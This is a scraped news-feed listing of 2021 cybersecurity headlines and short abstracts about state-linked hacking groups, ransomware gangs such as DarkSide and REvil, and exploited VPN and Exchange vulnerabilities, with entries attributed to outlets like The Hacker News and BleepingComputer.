Cybersecurity researchers from FireEye unmasked additional tactics, techniques, and procedures (TTPs) adopted by Chinese threat actors who were recently found abusing Pulse Secure VPN devices to drop malicious web shells and exfiltrate sensitive information from enterprise networks. FireEye's Mandiant threat intelligence team, which is tracking the cyberespionage activity under two threat clusters UNC2630 and UNC2717, said the intrusions line up with key Chinese government priorities, adding "many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent 14th Five Year Plan ." On April 20, the cybersecurity firm disclosed 12 different malware families, including STEADYPULSE and LOCKPICK, that have been designed with the express intent to infect Pulse Secure VPN appliances and put to use by several cyberespionage groups believed to be affiliated with the Chinese government. UNC263The Hacker News
May 27, 2021
Hackers Using Fake Foundations to Target Uyghur Minority in China Full Text
Abstract
The Uyghur community located in China and Pakistan has been the subject of an ongoing espionage campaign aiming to trick the targets into downloading a Windows backdoor to amass sensitive information from their systems. "Considerable effort was put into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up to date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups," according to joint research published by Check Point Research and Kaspersky today. The Uyghurs are a Turkic ethnic minority group originating from Central and East Asia and are recognized as native to the Xinjiang Uyghur Autonomous Region in Northwest China. At least since 2015, government authorities have placed the region under tight surveillance, putting hundreds of thousands into prisons and internment camps that the government calls "Vocational Education and Training Centers.The Hacker News
May 26, 2021
Agrius group targets Israel with data-wipers disguised as ransomware Full Text
Abstract
An Iran-linked threat actor tracked as Agrius employed data-wipers disguised as ransomware to destroy targeted IT infrastructure. Researchers from cyber-security firm SentinelOne discovered a new Iran-linked threat actor, tracked as Agrius, which...Security Affairs
May 24, 2021
North Korean hackers behind CryptoCore multi-million dollar heists Full Text
Abstract
Security researchers piecing together evidence from multiple attacks on cryptocurrency exchanges, attributed to a threat actor they named CryptoCore have established a strong connection to the North Korean state-sponsored group Lazarus.BleepingComputer
May 24, 2021
Researchers achieved persistent shell access on a Boeing 747 Full Text
Abstract
Researchers from Pen Test Partners established a persistent shell on an in-flight entertainment (IFE) system from a Boeing 747 airliner after exploiting a vulnerability dating back to 1999.The Register
May 20, 2021
What makes North Korean hacking groups more creative? Full Text
Abstract
From use of custom malware to pioneering strategies, North Korean hacking groups have shown an innovative spirit that helps them to punch above their weight.SCMagazine
May 20, 2021
Exchange Server Attackers Launched Scans Within Five Minutes of Disclosure Full Text
Abstract
Cheap cloud services support threat actor effortsInfosecurity Magazine
May 19, 2021
Hackers scan for vulnerable devices minutes after bug disclosure Full Text
Abstract
Every hour, a threat actor starts a new scan on the public web for vulnerable systems, moving at a quicker pace than global enterprises when trying to identify serious vulnerabilities on their networks.BleepingComputer
May 19, 2021
Colonial Pipeline Hackers Received $90 million in Bitcoin from Multiple Victims Before Shutting Down Full Text
Abstract
DarkSide, the group behind the recent Colonial Pipeline ransomware attack, received a total of $90 million in bitcoin ransom payments before shutting down last week, according to fresh research.NBC News
May 18, 2021
Try This One Weird Trick Russian Hackers Hate – Krebs on Security Full Text
Abstract
Digital extortion gangs like DarkSide take great care to make their entire platforms geopolitical, because their malware is engineered to work only in certain parts of the world.Krebs on Security
May 18, 2021
Researchers Discover Attackers Obfuscating IP Addresses Inside AWS Using Amazon VPC Service Full Text
Abstract
Security researchers have documented an attack technique that may allow attackers to leverage a legitimate Amazon VPC feature to mask their use of stolen API credentials inside AWS.Help Net Security
May 18, 2021
A Deep Dive Into DarkSide Operations Full Text
Abstract
The Colonial Pipeline, which carries fuel along a path of 5,500 miles all the way from Texas to New Jersey, was hacked by DarkSide ransomware operators. This ended up being the largest impact on the U.S. energy system from a cyberattack.Cyware Alerts - Hacker News
May 15, 2021
Group behind Colonial Pipeline hack to shut down operations: report Full Text
Abstract
The group behind the ransomware attack on Colonial Pipeline is reportedly shutting down its operations.The Hill
May 14, 2021
Pakistan-Linked Hackers Added New Windows Malware to Its Arsenal Full Text
Abstract
Cybercriminals with suspected ties to Pakistan continue to rely on social engineering as a crucial component of its operations as part of an evolving espionage campaign against Indian targets, according to new research. The attacks have been linked to a group called Transparent Tribe , also known as Operation C-Major, APT36, and Mythic Leopard, which has created fraudulent domains mimicking legitimate Indian military and defense organizations, and other malicious domains posing as file-sharing sites to host malicious artifacts. "While military and defense personnel continue to be the group's primary targets, Transparent Tribe is increasingly targeting diplomatic entities, defense contractors, research organizations and conference attendees, indicating that the group is expanding its targeting," researchers from Cisco Talos said on Thursday. These domains are used to deliver maldocs distributing CrimsonRAT , and ObliqueRAT, with the group incorporating new phishinThe Hacker News
May 14, 2021
Magecart gang hides PHP-based web shells in favicons Full Text
Abstract
Magecart cybercrime gang is using favicon to hide malicious PHP web shells used to maintain remote access to inject JavaScript skimmers into online stores. Magecart hackers are distributing malicious PHP web shells hidden in website favicon to inject...Security Affairs
May 14, 2021
Magecart Hackers Now hide PHP-Based Backdoor In Website Favicons Full Text
Abstract
Cybercrime groups are distributing malicious PHP web shells disguised as a favicon to maintain remote access to the compromised servers and inject JavaScript skimmers into online shopping platforms with an aim to steal financial information from their users. "These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online stores," Malwarebytes Jérôme Segura said in a Thursday write-up. "This technique is interesting as most client-side security tools will not be able to detect or block the skimmer." Injecting web skimmers on e-commerce websites to steal credit card details is a tried-and-tested modus operandi of Magecart, a consortium of different hacker groups who target online shopping cart systems. Also known as formjacking attacks, the skimmers take the form of JavaScript code that the operators stealthily insert into an e-commerce website, often on payment pages, with an intent to cThe Hacker News
May 14, 2021
Darkside Hacking Group Linked to Colonial Pipeline Attack Says it is Closing Down Full Text
Abstract
DarkSide has told associates it has lost access to the infrastructure it uses to run its operation and would be shutting down, citing pressure from law enforcement and from the U.S., FireEye said.The Wall Street Journal
May 13, 2021
Colonial Pipeline Attackers Linked to Infamous REvil Group Full Text
Abstract
East coast fuel pipeline slowly resumes operationsInfosecurity Magazine
May 13, 2021
Beyond Lazarus: North Korean cyber-threat groups become top-tier, ‘reckless’ adversaries Full Text
Abstract
Over recent years, North Korea has evolved from a nuisance to its neighbor South Korea and purveyor of ransomware and DDoS attacks to become the scourge of banks and cryptocurrency exchanges.The Daily Swig
May 12, 2021
Gig Workers Paid $500 for Payroll Passwords Full Text
Abstract
Argyle is paying workers to help hack payroll providers, researchers suspect.Threatpost
May 11, 2021
Researcher hacked Apple AirTag two weeks after its launch Full Text
Abstract
Apple AirTag has been launched less than two weeks ago, but a security researcher already claims to have hacked them. The Apple AirTag has been available for just a couple of weeks and hacking community is already working on it to demonstrate...Security Affairs
May 11, 2021
Sophisticated Cyber Group Designs Evasive Toolsets Full Text
Abstract
Researchers from Kaspersky uncover an ongoing espionage campaign called TunnelSnake targeting Asian and African diplomats and some high-profile organizations. The attack is being allegedly conducted by Chinese actors.Cyware Alerts - Hacker News
May 11, 2021
Roaming Mantis Evolving and Improvising its Smishing Campaign Full Text
Abstract
The Roaming Mantis threat actor group has improved its attack tactic to steal more funds while evading detection. The group is now using whitelisting to spread two new malware families. R esearchers suspect that this could be the work of more than one group of attackers working together.Cyware Alerts - Hacker News
May 10, 2021
Threat actors added thousands of Tor exit nodes to carry out SSL stripping attacks Full Text
Abstract
Since early 2020, bad actors have added Tor exit nodes to the Tor network to intercep traffic to cryptocurrency-related sites Starting from January 2020, a threat actor has been adding thousands of malicious exit relays to the Tor network to intercept...Security Affairs
May 07, 2021
US, UK authorities say Russian state-sponsored hackers exploited Microsoft vulnerabilities Full Text
Abstract
Russian state-sponsored hackers were among those to exploit recently uncovered vulnerabilities in Microsoft’s Exchange Server email application, which potentially compromised thousands of organizations, a coalition of American and British federal agencies warned Friday.The Hill
May 7, 2021
Hacking the Hackers, OGUsers Hacked Again Full Text
Abstract
OGUsers has been hacked for the fourth time in two years. The hacking forum’s database consisting of private messages and user records for almost 350,000 members is on sale now for $3,000.Cyware Alerts - Hacker News
May 07, 2021
Russian state hackers switch targets after US joint advisories Full Text
Abstract
Russian Foreign Intelligence Service (SVR) operators have switched their attacks to target new vulnerabilities in reaction to US govt advisories published last month with info on SVR tactics, tools, techniques, and capabilities used in ongoing attacks.BleepingComputer
May 6, 2021
REvil REvil - The Cyber Devil Full Text
Abstract
REvil is a fierce threat with its smart hacking tactics and techniques. The ransomware now spreads via exploit kits, RDP servers, backdoored software installers, and scan-and-exploit methods. Apply adequate security measures to stay protected.Cyware Alerts - Hacker News
May 5, 2021
Homecoming Queen Hacker to be Tried as an Adult Full Text
Abstract
Florida teen accused of hacking students’ accounts to rig homecoming contest to face felony charges as an adultInfosecurity Magazine
May 2, 2021
Hacking a Tesla Model X with a DJI Mavic 2 drone equipped with a WIFI dongle Full Text
Abstract
A security duo has demonstrated how to hack a Tesla Model X’s and open the doors using a DJI Mavic 2 drone equipped with a WIFI dongle. The scenario is disconcerting, hackers could use a drone to fly on your Tesla Model X and open the doors, a couple...Security Affairs
May 1, 2021
Lazarus Group Looks to Cryptocurrency Theft to Diversify its Attack Tactics Full Text
Abstract
While the North Korean threat actor had targeted e-commerce shops in 2019 and 2020 to steal payment card information, the attackers aimed to steal cryptocurrency, as well.Cyware Alerts - Hacker News
May 1, 2021
SolarMarket RAT Uses Google SEO Tactics to Lure Victims Full Text
Abstract
Attackers are using Google search redirection and drive-by-download tactics to infect targeted users with SolarMarker RAT.Cyware Alerts - Hacker News
April 30, 2021
Suspected Chinese state hackers target Russian submarine designer Full Text
Abstract
Hackers suspected to work for the Chinese government have used a new malware called PortDoor to infiltrate the systems of an engineering company that designs submarines for the Russian Navy.BleepingComputer
April 29, 2021
Russian Hackers Actively Targeting the U.S. and Other Organizations Full Text
Abstract
The FBI, the DHS, and the CISA warned of coordinated attacks, in a joint alert, by the Russian Foreign Intelligence Service, aka APT29, against U.S. and foreign organizations.Cyware Alerts - Hacker News
April 29, 2021
LuckyMouse Hackers Target Banks, Companies and Governments in 2020 Full Text
Abstract
An adversary known for its watering hole attacks against government entities has been linked to a slew of newly detected intrusions targeting various organizations in Central Asia and the Middle East. The malicious activity, collectively named "EmissarySoldier," has been attributed to a threat actor called LuckyMouse, and is said to have happened in 2020 with the goal of obtaining geopolitical insights in the region. The attacks involved deploying a toolkit dubbed SysUpdate (aka Soldier) in a number of breached organizations, including government and diplomatic agencies, telecom providers, a TV media company, and a commercial bank. LuckyMouse , also referred to as APT27 and Emissary Panda, is a sophisticated cyberespionage group that has a history of breaching multiple government networks in Central Asia and the Middle East. The actor has also been linked to cyberattacks aimed at transnational organizations such as the International Civil Aviation Organization ( ICAO )The Hacker News
April 27, 2021
Hackers Threaten to Leak D.C. Police Informants’ Info If Ransom Is Not Paid Full Text
Abstract
The Metropolitan Police Department (MPD) of the District of Columbia has become the latest high-profile government agency to fall victim to a ransomware attack. The Babuk Locker gang claimed in a post on the dark web that they had compromised the DC Police's networks and stolen 250 GB of unencrypted files. Screenshots shared by the group, and seen by The Hacker News, include various folders containing what appears to be investigation reports, arrests, disciplinary actions, and other intelligence briefings. Also called the DC Police, the MPD is the primary law enforcement agency for the District of Columbia in the U.S. The ransomware gang has given the department three days to heed to their ransom demand or risk leaking sensitive files that could expose police informants to criminal gangs. "Hello! Even an institution such as DC can be threatened, we have downloaded a sufficient amount of information from your internal networks, and we advise you to contact us as soon as pThe Hacker News
April 27, 2021
Another SolarWinds lesson: Hackers are targeting Microsoft authentication servers Full Text
Abstract
Mandiant Tuesday detailed a new attack strategy against Microsoft’s Active Directory Federation Services (AD FS). Researchers believe the need to protect AD FS might be the unheralded second lesson from the SolarWinds campaign.SCMagazine
April 27, 2021
Hackers Exploit 0-Day Gatekeeper Flaw to Attack MacOS Computers Full Text
Abstract
Security is only as strong as the weakest link. As further proof of this, Apple released an update to macOS operating systems to address an actively exploited zero-day vulnerability that could circumvent all security protections, thus permitting unapproved software to run on Macs. The macOS flaw, identified as CVE-2021-30657 , was discovered and reported to Apple by security engineer Cedric Owens on March 25, 2021. "An unsigned, unnotarized, script-based proof of concept application [...] could trivially and reliably sidestep all of macOS's relevant security mechanisms (File Quarantine, Gatekeeper, and Notarization Requirements), even on a fully patched M1 macOS system," security researcher Patrick Wardle explained in a write-up. "Armed with such a capability macOS malware authors could (and are) returning to their proven methods of targeting and infecting macOS users." Apple's macOS comes with a feature called Gatekeeper , which allows only trusteThe Hacker News
April 27, 2021
REvil Removes Apple Extortion Attempt from Site: Report Full Text
Abstract
Mystery as ransomware group deletes all mention of schemeInfosecurity Magazine
April 27, 2021
Ransomware Group Threatens DC Cops with Informant Data Leak Full Text
Abstract
Babuk is reportedly ready to share info with local gangsInfosecurity Magazine
April 25, 2021
Hackers are targeting Soliton FileZen file-sharing servers Full Text
Abstract
Threat actors are exploiting two flaws in the popular file-sharing server FileZen to steal sensitive data from businesses and government organizations. Threat actors are exploiting two vulnerabilities in the popular file-sharing server FileZen, tracked...Security Affairs
April 23, 2021
Oscar-Bait, Literally: Hackers Abuse Nominated Films for Phishing, Malware Full Text
Abstract
Judas and the Black Messiah may be a favorite for Best Picture at the 93rd Academy Awards on Sunday, but it’s a fave for cybercriminals too.Threatpost
April 22, 2021
Researchers Find Additional Infrastructure Used By SolarWinds Hackers Full Text
Abstract
The sprawling SolarWinds cyberattack which came to light last December was known for its sophistication in the breadth of tactics used to infiltrate and persist in the target infrastructure, so much so that Microsoft went on to call the threat actor behind the campaign "skillful and methodic operators who follow operations security (OpSec) best practices to minimize traces, stay under the radar, and avoid detection." But new research published today shows that the threat actor carefully planned each stage of the operation to "avoid creating the type of patterns that make tracking them simple," thus deliberately making forensic analysis difficult. By analyzing telemetry data associated with previously published indicators of compromise, RiskIQ said it identified an additional set of 18 servers with high confidence that likely communicated with the targeted, secondary Cobalt Strike payloads delivered via the TEARDROP and RAINDROP malware, representing a 56% jumThe Hacker News
April 21, 2021
REvil seeks to extort Apple and hits supplier with $50 million ransom Full Text
Abstract
REvil – which has been on a tear the past several weeks – wants Apple to pay an undisclosed ransom by May 1 to “buy back” 15 stolen schematics of unreleased MacBooks and gigabytes of personal data on several major Apple brands they obtained from Quanta.SCMagazine
April 21, 2021
Someone is using SonicWall’s email security tool to hack customers Full Text
Abstract
It’s the second time SonicWall has been hit with an attack leveraging previously unknown weaknesses in their security products this year.SCMagazine
April 21, 2021
Logins for 1.3 million Windows RDP servers collected from hacker market Full Text
Abstract
The login names and passwords for 1.3 million current and historically compromised Windows Remote Desktop servers have been leaked by UAS, the largest hacker marketplace for stolen RDP credentials.BleepingComputer
April 20, 2021
WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations Full Text
Abstract
If the Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch yet. At least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks. "A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, CVE-2021-22893 , are responsible for the initial infection vector," cybersecurity firm FireEye said on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances. The company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (&quThe Hacker News
April 20, 2021
REvil gang tries to extort Apple, threatens to sell stolen blueprints Full Text
Abstract
The REvil ransomware gang asked Apple to "buy back" stolen product blueprints to avoid having them leaked on REvil's leak site before today's Apple Spring Loaded event where the new iMac was introduced.BleepingComputer
April 20, 2021
Hacking a X-RAY Machine with WHIDelite & EvilCrowRF Full Text
Abstract
The popular cyber security expert Luca Bongiorni demonstrated how to hack an X-Ray Machine using his WHIDelite tool. Recently I bought a X-RAY machine from China to have some ghetto-style desktop setup in order to inspect/reverse engineer some PCBs...Security Affairs
April 20, 2021
Hackers exploit unpatched vulnerabilities, zero day to attack governments and contractors Full Text
Abstract
FireEye’s Mandiant team revealed ongoing exploitation of vulnerabilities in Pulse Secure VPN devices by at least two hacking groups, one of which they linked to China, to attack governments, defense contractors and other businesses in the U.S. and Europe.SCMagazine
April 20, 2021
Threat Actor Claims to Have Hacked Domino’s Full Text
Abstract
Hacker claims to have stolen 13TBs of data from multinational pizza chain’s Indian wingInfosecurity Magazine
April 20, 2021
Foreign threat actors used fake LinkedIn profiles to lure 10,000 UK nationals Full Text
Abstract
The targeting shows that humans remain the weak link in any cyber and data security strategy.SCMagazine
April 20, 2021
Watch out, hackers can take over your Cosori Smart Air Fryer Full Text
Abstract
Watch out, hackers could breach into your house by exploiting two remote code execution (RCE) vulnerabilities in the Cosori Smart Air Fryer. Security experts from Cisco Talos have found two remote code execution (RCE) vulnerabilities in the Cosori...Security Affairs
April 20, 2021
Codecov hackers breached hundreds of restricted customer sites: sources Full Text
Abstract
The attackers used automation to rapidly copy customer credentials and raid additional resources, the investigators said, expanding the breach beyond the initial disclosure by Codecov on Thursday.Reuters
April 20, 2021
North Korean hackers adapt web skimming for stealing Bitcoin Full Text
Abstract
Hackers linked with the North Korean government applied the web skimming technique to steal cryptocurrency in a previously undocumented campaign that started early last year, researchers say.BleepingComputer
April 19, 2021
Experts demonstrated how to hack a utility and take over a smart meter Full Text
Abstract
Researchers from the FireEye’s Mandiant team have breached the network of a North American utility and turn off one of its smart meters. Over the years, the number of attacks against ICS/SCADA systems used by industrial organizations worldwide has rapidly...Security Affairs
April 19, 2021
Chinese threat actors extract big data and sell it on the dark web Full Text
Abstract
The stolen data ranges from lottery and stock data to commercial databases of Canadian and U.S. businesses.SCMagazine
April 16, 2021
Lazarus E-Commerce Attackers Also Targeted Cryptocurrency Full Text
Abstract
Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to Group-IB.Careers Info Security
April 16, 2021
Trickbot Actors Target Slack and BaseCamp Users Full Text
Abstract
Customized scam messages designed to deploy malware loaderInfosecurity Magazine
April 15, 2021
Lazarus E-Commerce Attackers Also Targeted Cryptocurrency Full Text
Abstract
Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to the cybersecurity firm Group-IB.Gov Info Security
April 15, 2021
Attackers Target ProxyLogon Exploit to Install Cryptojacker Full Text
Abstract
Threat actors targeted compromised Exchange servers to host malicious Monero cryptominer in an “unusual attack,” Sophos researchers discovered.Threatpost
April 15, 2021
Global Attacker Dwell Time Drops to Just 24 Days Full Text
Abstract
Ransomware spike and better threat detection play a partInfosecurity Magazine
April 14, 2021
FireEye: 650 new threat groups were tracked in 2020 Full Text
Abstract
FireEye published its M-Trend 2021 report based on the data collected during the investigation, 650 new threat groups were tracked in 2020 FireEye published its annual report, titled M-Trend 2021, which is based on the data collected during the investigation...Security Affairs
April 09, 2021
Hackers Tampered With APKPure Store to Distribute Malware Apps Full Text
Abstract
APKPure, one of the largest alternative app stores outside of the Google Play Store, was infected with malware this week, allowing threat actors to distribute Trojans to Android devices. In an incident that's similar to that of German telecommunications equipment manufacturer Gigaset , the APKPure client version 3.17.18 is said to have been tampered with in an attempt to trick unsuspecting users into downloading and installing malicious applications linked to the malicious code built into the APKpure app. The development was reported by researchers from Doctor Web and Kaspersky . "This trojan belongs to the dangerous Android.Triada malware family capable of downloading, installing and uninstalling software without users' permission," Doctor Web researchers said. According to Kaspersky, the APKPure version 3.17.18 was tweaked to incorporate an advertisement SDK that acts as a Trojan dropper designed to deliver other malware to a victim's device. "ThiThe Hacker News
April 9, 2021
Cloud-native watering hole attack: Simple and potentially devastating Full Text
Abstract
The perpetrators are as diverse as their targets – fraudsters looking to steal identities, cybercriminal gangs in pursuit of quick profits, state-backed attackers seeking access to larger networks.Help Net Security
April 8, 2021
Hackers Are Exploiting Discord and Slack Links to Serve Up Malware Full Text
Abstract
New research by Talos highlights how, over the course of the Covid-19 pandemic, collaboration tools like Slack and, much more commonly, Discord have become handy mechanisms for cybercriminals.Wired
April 8, 2021
Hackers Selling 330,000 Stolen Payment Cards and 895,000 Gift Cards from Online Shops Full Text
Abstract
What do the likes of AirBnB, Amazon, American Airlines, Chipotle, Dunkin Donuts, Nike, Marriott, Target, Subway and Walmart, have in common? Well,...Cyber Security News
April 7, 2021
Threat actors targeted Slack and Discord as the pandemic raged on Full Text
Abstract
Collaboration tools that have become more central to how organizations operate since the pandemic are poorly understood by infosec teams and are relatively immature in terms of accompanying security protections provided by third parties.SCMagazine
April 07, 2021
VISA: Hackers increasingly using web shells to steal credit cards Full Text
Abstract
Global payments processor VISA warns that threat actors are increasingly deploying web shells on compromised servers to exfiltrate credit card information stolen from online store customers.BleepingComputer
April 6, 2021
Chinese Hackers Selling Intimate Stolen Camera Footage Full Text
Abstract
A massive operation offers access to hacked camera feeds in bedrooms and at hotels.Threatpost
April 06, 2021
Hacker sells $38M worth of gift cards from thousands of shops Full Text
Abstract
A Russian hacker has sold on a top-tier underground forum close to 900,000 gift cards with a total value estimated at $38 million.BleepingComputer
April 6, 2021
Hackers actively targeting unsecured SAP installs, DHS, SAP and Onapsis warn Full Text
Abstract
With a base of 400,000 clients, SAP chief information security officer said this of the alert: “We want them to be aware of what could be the art of the possible.”SCMagazine
April 06, 2021
Hackers From China Target Vietnamese Military and Government Full Text
Abstract
A hacking group related to a Chinese-speaking threat actor has been linked to an advanced cyberespionage campaign targeting government and military organizations in Vietnam. The attacks have been attributed with low confidence to the advanced persistent threat (APT) called Cycldek (or Goblin Panda, Hellsing, APT 27, and Conimes), which is known for using spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the U.S. at least since 2013. According to researchers from Kaspersky, the offensive, which was observed between June 2020 and January 2021, leverages a method called DLL side-loading to execute shellcode that decrypts a final payload dubbed " FoundCore ." DLL side-loading has been a tried-and-tested technique used by various threat actors as an obfuscation tactic to bypass antivirus defenses. By loading malicious DLLs into legitimate executables, the idea is to mask their malicious activity under a trusted system or software procThe Hacker News
April 5, 2021
Spy Operations Target Vietnam with Sophisticated RAT Full Text
Abstract
Researchers said the FoundCore malware represents a big step forward when it comes to evasion.Threatpost
April 5, 2021
Once Again, North Korean Hackers Target Security Researchers Full Text
Abstract
According to Google's Threat Analysis Group (TAG), the attackers created a website for a fake company offering offensive security services to attract security researchers.Cyware Alerts - Hacker News
April 5, 2021
Threat Actors Behind Hancitor Malware uses Network Ping Tool to Enumerate Active Directory (AD) Environment Full Text
Abstract
Hancitor is an information stealer and malware downloader used by a threat actor designated as MAN1, Moskalvzapoe, or TA511.Cyber Security News
April 5, 2021
The leap of a Cycldek-related threat actor Full Text
Abstract
In the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous DLL side-loading triad.Kaspersky Labs
April 3, 2021
Hunting the hunters: How Russian hackers targeted US cyber first responders in SolarWinds breach Full Text
Abstract
After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down.CNN Money
April 02, 2021
FBI and CISA warn of state hackers attacking Fortinet FortiOS servers Full Text
Abstract
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warn of advanced persistent threat (APT) actors targeting Fortinet FortiOS servers using multiple exploits.BleepingComputer
April 2, 2021
Recent Hancitor Infections Use Cobalt Strike and a Network Ping Tool Full Text
Abstract
As early as October 2020, Hancitor began utilizing Cobalt Strike and some of these infections utilized a network ping tool to enumerate the infected host’s internal network.Palo Alto Networks
April 2, 2021
Bahamut Possibly Responsible for Multi-Stage Infection Chain Campaign Full Text
Abstract
Threat researchers discovered cyberthreat actors distributing malicious documents exploiting a vulnerability (CVE-2017-8570) during a multi-stage infection chain to install a Visual Basic (VB) executable on target machines.Anomali
April 1, 2021
North Korean Hackers Expand Targeting of Security Community Full Text
Abstract
New fake company and social profiles seek to lure researchersInfosecurity Magazine
April 1, 2021
Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service Full Text
Abstract
When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process. This can be used to bypass firewalls that block unknown processes.FireEye
March 31, 2021
Hackers Set Up a Fake Cybersecurity Firm to Target Security Experts Full Text
Abstract
A North Korean government-backed campaign targeting cybersecurity researchers with malware has re-emerged with new tactics in their arsenal as part of a fresh social engineering attack. In an update shared on Wednesday, Google's Threat Analysis Group said the attackers behind the operation set up a fake security company called SecuriElite and a slew of social media accounts across Twitter and LinkedIn in an attempt to trick unsuspecting researchers into visiting the company's booby-trapped website "where a browser exploit was waiting to be triggered." "The new website claims the company is an offensive security company located in Turkey that offers pentests, software security assessments and exploits," TAG's Adam Weidemann said . The website is said to have gone live on March 17. A total of eight Twitter profiles and seven LinkedIn profiles, who claimed to be vulnerability researchers and human resources personnel at different security firms (incluThe Hacker News
March 31, 2021
North Korea-linked hackers target security experts again Full Text
Abstract
Researchers from Google's Threat Analysis Group (TAG) reported that North Korea-linked hackers are targeting security researchers via social media. The cyberspies used fake Twitter and LinkedIn social media accounts to get in contact with the victims....Security Affairs
March 31, 2021
Google: North Korean hackers target security researchers again Full Text
Abstract
Google's Threat Analysis Group (TAG) says that North Korean government-sponsored hackers are once again targeting security researchers using fake Twitter and LinkedIn social media accounts.BleepingComputer
March 31, 2021
Iranian credential thieves targeting medical researchers Full Text
Abstract
In late 2020, a well-known hacker group believed to be sponsored by the Iranian government started a credential harvesting campaign targeting United States and Israeli medical personnel, according to new research from Proofpoint.SCMagazine
March 31, 2021
Adversaries are using backdoored video game cheat engines and modding tools Full Text
Abstract
Talos detected a new cryptor used in several different malware campaigns hidden in files that users would usually download to install cheat codes into video games or other visual and game mods.Cisco Talos
March 31, 2021
Iranian hackers targeting US, Israeli medical researchers: analysis Full Text
Abstract
A hacking group associated with the Iranian government targeted senior medical researchers in the U.S. and Israel over the past few months, new research released Wednesday found.The Hill
March 31, 2021
Hackers are implanting multiple backdoors at industrial targets in Japan Full Text
Abstract
Cybersecurity researchers on Tuesday disclosed details of a sophisticated campaign that deploys malicious backdoors for the purpose of exfiltrating information from a number of industry sectors located in Japan. Dubbed "A41APT" by Kaspersky researchers, the findings delve into a new slew of attacks undertaken by APT10 (aka Stone Panda or Cicada) using previously undocumented malware to deliver as many as three payloads such as SodaMaster, P8RAT, and FYAnti. The long-running intelligence-gathering operation first came into the scene in March 2019, with activities spotted as recently as November 2020, when reports emerged of Japan-linked companies being targeted by the threat actor in over 17 regions worldwide. The fresh attacks uncovered by Kaspersky are said to have occurred in January 2021. The infection chain leverages a multi-stage attack process, with the initial intrusion happening via abuse of SSL-VPN by exploiting unpatched vulnerabilities or stolen credentialThe Hacker News
March 30, 2021
SolarWinds Attackers Accessed DHS Emails, Report Full Text
Abstract
Current and former administration sources say the nation-state attackers were able to read the Homeland Security Secretary’s emails, among others.Threatpost
March 30, 2021
SolarWinds Attackers Accessed DHS Secretary’s Emails — Report Full Text
Abstract
Trump administration’s security boss and staff compromisedInfosecurity Magazine
March 29, 2021
RedEcho group parks domains after public exposure Full Text
Abstract
RedEcho, which was linked to a campaign that targeted India’s power grid, has taken down its attack infrastructure after having its operations exposed at the end of February 2021.The Record
March 26, 2021
Suspected Chinese Group Exploiting Microsoft Exchange Servers Full Text
Abstract
Beginning on March 1, 2021, Recorded Future’s Insikt Group identified a large increase in victim communications to PlugX command and control (C2) infrastructure publicly attributed to the suspected Chinese state-sponsored group Calypso APT.Recorded Future
March 25, 2021
Chinese Hackers Used Facebook to Hack Uighur Muslims Living Abroad Full Text
Abstract
Facebook may be banned in China, but the company on Wednesday said it has disrupted a network of bad actors using its platform to target the Uyghur community and lure them into downloading malicious software that would allow surveillance of their devices. "They targeted activists, journalists and dissidents predominantly among Uyghurs from Xinjiang in China primarily living abroad in Turkey, Kazakhstan, the United States, Syria, Australia, Canada and other countries," Facebook's Head of Cyber Espionage Investigations, Mike Dvilyanski, and Head of Security Policy, Nathaniel Gleicher, said . "This group used various cyber espionage tactics to identify its targets and infect their devices with malware to enable surveillance." The social media giant said the "well-resourced and persistent operation" aligned with a threat actor known as Evil Eye (or Earth Empusa), a China-based collective known for its history of espionage attacks against the Muslim mThe Hacker News
March 25, 2021
Chinese Hackers Used Facebook to Hack Uyghurs Living Abroad Full Text
Abstract
Facebook’s head of cyberespionage said it had found and removed fewer than 500 accounts that sent malicious links to Uyghurs as part of “an extremely targeted operation.”NBC News
March 24, 2021
Facebook takes action against Chinese hackers targeting Uyghurs Full Text
Abstract
Facebook on Wednesday announced that it had taken steps to disrupt efforts of Chinese hacking groups to target and surveil members of the Uyghur community both in China and abroad.The Hill
March 24, 2021
Facebook blocks Chinese state hackers targeting Uyghur activists Full Text
Abstract
Facebook took down accounts used by a Chinese-sponsored hacking group to deploy surveillance malware on devices used by Uyghurs activists, journalists, and dissidents living outside China.BleepingComputer
March 21, 2021
Swiss Firm Says It Has Accessed Servers of a SolarWinds Hacker Full Text
Abstract
A Swiss cybersecurity firm says it has accessed servers used by a hacking group tied to the SolarWinds breach, revealing details about who the attackers targeted and how they carried out their operation.Bloomberg Quint
March 20, 2021
Hacking group used 11 zero-days to attack Windows, iOS, Android users Full Text
Abstract
Project Zero, Google's zero-day bug-hunting team, discovered a group of hackers that used 11 zero-days in attacks targeting Windows, iOS, and Android users within a single year.BleepingComputer
March 20, 2021
Magecart Hackers Hide the Credit Card Data in Image Files Full Text
Abstract
Nowadays the cybercriminals are mainly focusing on credit card theft, as they always try their best to find different methods to successfully...Cyber Security News
March 19, 2021
Threat actors are attempting to exploit CVE-2021-22986 in F5 BIG-IP devices in the wild Full Text
Abstract
Cybersecurity experts warn of ongoing attacks aimed at exploiting a recently patched critical vulnerability in F5 BIG-IP and BIG-IQ networking devices. Cybersecurity experts from NCC Group and Bad Packets security firm this week detected a wave...Security Affairs
March 19, 2021
REvil is on Another Attack Spree Full Text
Abstract
